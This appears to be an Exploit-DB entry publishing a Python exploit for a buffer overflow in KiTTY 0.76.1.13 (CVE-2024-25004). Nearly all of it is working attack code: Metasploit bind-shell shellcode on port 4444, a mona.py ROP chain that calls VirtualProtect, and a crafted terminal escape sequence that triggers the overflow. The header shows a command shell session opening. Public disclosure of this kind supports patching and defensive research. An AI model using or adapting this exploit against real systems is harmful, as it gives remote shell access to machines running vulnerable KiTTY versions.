KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow

EDB-ID:

51891


Author:

DEFCESCO

Type:

local


Platform:

Windows

Date:

2024-03-14


# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-25004
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
# [*] Payload Handler Started as Job 1                                                #
# msf6 payload(windows/shell_bind_tcp) >                                              #
# [*] Started bind TCP handler against 192.168.100.28:4444                            #
# [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   # 
#-------------------------------------------------------------------------------------#

import sys
import os
import struct

#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
# windows/shell_bind_tcp - 355 bytes                                                  #
# https://metasploit.com/                                                             #
# Encoder: x86/shikata_ga_nai                                                         #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
# AutoVerifySession=true                                                              #
#-------------------------------------------------------------------------------------#

buf =  b""
buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"


def shellcode():
	sc = b'' 
	sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
	sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
	sc += b'\x29\xD8'             # sub    eax,ebx
	sc += b'\x29\xC4'             # sub    esp,eax
	sc += buf
	sc += b'\x90' * (1042-len(sc))
	assert len(sc) == 1042 
	return sc


def create_rop_chain():
	# rop chain generated with mona.py - www.corelan.be
	rop_gadgets = [
	#[---INFO:gadgets_to_set_esi:---]
	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
	#[---INFO:gadgets_to_set_ebp:---]
	0x00429953,  # POP EBP # RETN [kitty.exe]
	0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
	#[---INFO:gadgets_to_set_ebx:---]
	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
	0x00000201,  # 0x00000201-> ebx
	#[---INFO:gadgets_to_set_edx:---]
	0x00430dce,  # POP EDX # RETN [kitty.exe]
	0x00000040,  # 0x00000040-> edx
	#[---INFO:gadgets_to_set_ecx:---]
	0x005ac58c,  # POP ECX # RETN [kitty.exe]
	0x004d81d9,  # &Writable location [kitty.exe]
	#[---INFO:gadgets_to_set_edi:---]
	0x004fa404,  # POP EDI # RETN [kitty.exe]
	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
	#[---INFO:gadgets_to_set_eax:---]
	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
	0x90909090,  # nop
	0x41414141,  # Filler (compensate)
	#[---INFO:pushad:---]
	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
	]
	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()


#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d                                           #
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                   #
#   ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
#   ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}                      #
# Shellcode size at ESP: 1042 bytes                                                #
#----------------------------------------------------------------------------------#

return_address = struct.pack('<I',  0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}

rop_chain_padding = b'\x90' * 27
nops = b'\x90' * 88

escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
escape_sequence += nops + b'\007'

stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()